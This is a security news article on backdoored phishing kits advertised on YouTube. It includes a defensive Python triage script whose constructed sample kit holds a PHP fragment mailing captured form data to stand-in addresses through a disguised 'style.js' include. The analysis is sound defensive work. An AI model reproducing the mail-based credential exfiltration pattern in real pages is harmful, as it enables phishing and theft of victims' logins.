Scammers advertise backdoored phishing templates on YouTube

Security experts from Proofpoint observed scammers exploiting YouTube to promote their backdoored phishing templates.

According to experts from the security firm Proofpoint, scammers are advertising backdoored phishing templates on YouTube, along with “how-to” videos and manuals.

This is not a novelty: cyber criminals are turning to legitimate websites to offer their products and services.

Proofpoint researchers have observed scammers distributing phishing templates and related kits via YouTube; a query for “paypal scama” returns over 114,000 results.

The kits offered for sale through YouTube include a backdoor that automatically sends the phished information back to the author.

“A simple search for “paypal scama” returns over 114,000 results. There’s a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren’t new, the use of YouTube to advertise and distribute them is a new trend.” reads a blog post published by Proofpoint.

The videos show the appearance of the templates and instruct potential buyers on how to steal information from victims with phishing attacks.

As an example of these malicious kits, the post shows an Amazon phishing template that replicates the legitimate login page of the popular website.

The researchers downloaded one of the kits advertised on YouTube and analyzed it, discovering that the clumsy scammer left his Gmail address hardcoded in the template, alongside an email address used to receive the stolen credentials from the template.

The researchers also analyzed a template for PayPal scammers that was improved to avoid suspicion.

“In this PayPal scam, the author attempts to avoid raising suspicions by adding a PHP include for a file called style.js just before the PHP “mail” command is used to ship off the stolen credentials.” reads the analysis.
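For analysts or hosting abuse teams triaging a recovered kit, the two tells described above (an include of a file that is not a PHP file, and hardcoded mail recipients) can be checked statically. The following is an added example, not code from Proofpoint or from the kits; the sample files, their contents and all addresses are constructed, and what a real style.js contains is an assumption.

```python
import re

# Constructed stand-in for a recovered kit; contents and addresses are made up.
SAMPLE_KIT = {
    "login.php": '<?php\n$to = "first@example.com";\ninclude "style.js";\n'
                 'mail($to, $subject, $message);\n?>',
    # Assumption: the "script" file actually carries PHP and a second address.
    "style.js": '<?php $copy = "second@example.net"; ?>',
    "index.html": "<form action='login.php' method='post'></form>",
}

INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*["\']([^"\']+)["\']', re.I)
MAIL_RE = re.compile(r'\bmail\s*\(', re.I)
EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')
PHP_EXT = (".php", ".inc", ".phtml")


def triage_kit(files):
    """Static triage of {filename: source text}; nothing is executed."""
    findings = {"odd_includes": [], "php_in_non_php": [],
                "mail_files": [], "addresses": {}}
    for name, text in files.items():
        # PHP include/require whose target does not look like a PHP file.
        for target in INCLUDE_RE.findall(text):
            if not target.lower().endswith(PHP_EXT):
                findings["odd_includes"].append((name, target))
        has_php = "<?php" in text or "<?=" in text
        # PHP open tag inside a file named as a script, style or image.
        if has_php and not name.lower().endswith(PHP_EXT):
            findings["php_in_non_php"].append(name)
        # Files that call PHP mail(), the exfiltration step in these kits.
        if has_php and MAIL_RE.search(text):
            findings["mail_files"].append(name)
        # Every hardcoded address, mapped to the files it appears in.
        for addr in EMAIL_RE.findall(text):
            findings["addresses"].setdefault(addr.lower(), []).append(name)
    return findings


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(key, value)
```

Addresses that appear only in included non-PHP files are the ones to record first in an abuse report, since they are likely to identify the kit's author rather than its operator.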

The researchers noticed that many videos have been online for months, which suggests that YouTube lacks filtering mechanisms for this kind of content.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” states Proofpoint.

Stay Tuned.

Pierluigi Paganini

(Security Affairs – phishing templates, cybercrime)

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.
